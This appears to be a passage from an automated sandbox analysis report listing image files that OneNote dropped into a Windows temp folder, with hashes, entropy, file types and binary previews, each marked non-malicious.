                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                  C:\Users\user\AppData\Local\Temp\{E99FDC2C-3A79-47A1-81D4-FA20DC4B64C2}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):84097
                                                                                                  Entropy (8bit):7.78862495530604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                  MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                  SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                  SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                  SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

                                                                                                  C:\Users\user\AppData\Local\Temp\{E9CD9E38-3552-46D6-8403-248FBA09693C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):22634
                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                  C:\Users\user\AppData\Local\Temp\{E9D48CBE-44FE-4D23-B9F2-2C12B17886AD}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11449
                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                  C:\Users\user\AppData\Local\Temp\{EA147BA0-AC2D-40DF-93AA-443CA29376C3}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14458
                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                  C:\Users\user\AppData\Local\Temp\{EB56D2AB-4B96-43CA-8530-9AE6EE973451}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2695
                                                                                                  Entropy (8bit):7.434963358385164
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                  MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                  SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                  SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                  SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.

                                                                                                  C:\Users\user\AppData\Local\Temp\{EBE99D40-57B7-43CE-AC67-917EBE5BFFB5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):68633
                                                                                                  Entropy (8bit):7.709776384921022
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                  MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                  SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                  SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                  SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

                                                                                                  C:\Users\user\AppData\Local\Temp\{ECCABA22-7976-493F-AC7A-F5EF21003246}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27862
                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                  C:\Users\user\AppData\Local\Temp\{ECDD561E-CA23-43AA-86BF-2F3F69D92CD5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 60 x 336, 4-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):347
                                                                                                  Entropy (8bit):6.85024426015615
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
                                                                                                  MD5:78762C169F8B104CB57DFF5A1669D2DF
                                                                                                  SHA1:9638B71B584CD636834016A635ABF8D9C0887711
                                                                                                  SHA-256:E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
                                                                                                  SHA-512:5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{ED5FA46E-225C-40E3-935F-2B3DFD583005}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 70x626, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3428
                                                                                                  Entropy (8bit):7.766473352510893
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:/hdu7isPwAp7zesusUyYAatNG87llTONQYS:5di5tfuQ9atNZlaC
                                                                                                  MD5:EE9E2DF458733B61333E8A82F7A2613D
                                                                                                  SHA1:A86704C969F51B86D6A05ED51C6C60214ED9FA89
                                                                                                  SHA-256:BE4F0E6C89FCE91B9EBD2623567F7DFC259E0E3C77C9158742B8F64B724DF673
                                                                                                  SHA-512:BFB5D6DD6B66EE21E946E90D1E482384CD10244308562DDA814189602681DADDE5752B80519E5B8515F115A71BD6BB4317A59BE65B8B5E3474AED119F8303569
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......r.F.."........................................H............................!Qaq.."12.....#3ARbr...$B...cd...&CSu.....................................+.......................12..aAQ.!#q.."................?...#...3.Za......rV.5&...../"..i.t...j..W........d.FL.V.2K....]t.f.d.NK..:.....f...... ......2.[...#..D...ZK....p.z.E.N..T..L.-....1....2.\.6FIr2..zS\U#..........fB\t..5J..~q...D....A.......!....MY..../.HY..../e.M.Y.n.~..,....'..Pc...l...d2..m.f.it$..qx-z*...._..].cOO....n..&.....FIA.....2J2..d:<qc..6.I.G.N....f.K..Dx.-.......`....2.FZ."K7.r}..<.P.Z.da.Y.....8..s....G.....b.e..g .S.......FL.Z,&..q.MG.J+..x\..m...qN=.....)..`...&Y...S....u6{.z.g.....@......FL.ZL&.Iv.w..8....U..v...*.q.B.v_./A..#.#.g.j........*J;...u...W.Ao...%....#$.....M..^\{W.SO...s,.N.....c).,.B.Gv...."k..z."..S]H.

                                                                                                  C:\Users\user\AppData\Local\Temp\{F01D70D9-CC38-4345-9E56-F3141A7CEDFC}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Temp\{F074BE1C-F955-450C-A1F9-ED5AB429A4B0}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{F0A1EC0C-C4A9-477E-9DC6-8830FA55851F}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52912
                                                                                                  Entropy (8bit):7.679147474806877
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:DB/nIviNJD9C8kfJj6TkVr4q24FsUpjPc021si:DdnIvi3D9C8Cl6Dq24ayPCz
                                                                                                  MD5:1122BF4C2A42B4FA7F29D3C94954A7C9
                                                                                                  SHA1:3750077A830FE21735A43ABD35C63BA9A4D4B0DE
                                                                                                  SHA-256:423B0DD1A93B391D15B1DC8D8757C3BF5725FF2E7A59E6E3140033E2876B67F6
                                                                                                  SHA-512:4626EFE2EDED2361D6296B57F994DC434CC9D02357A8A6A67D84A544FB8A1CFE0005EA98F846AB963BED7F2B6CE96BC9181182C9459843A52A98D3A731A4FE73
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:27:10............................f.........................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....]+\.9.9.P.d..Z.?~>.-...]6=....*.......S.9G...b<$..Z..........>.v.o:.o%.e...z.F`...[.wo..z.....k..E...5....G..7.......c2..

                                                                                                  C:\Users\user\AppData\Local\Temp\{F2B4735E-FE6B-4FC3-8E5D-693BD15F4969}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2270
                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                  C:\Users\user\AppData\Local\Temp\{F3262E1F-F84F-49F3-828F-68A5C79D9EF2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
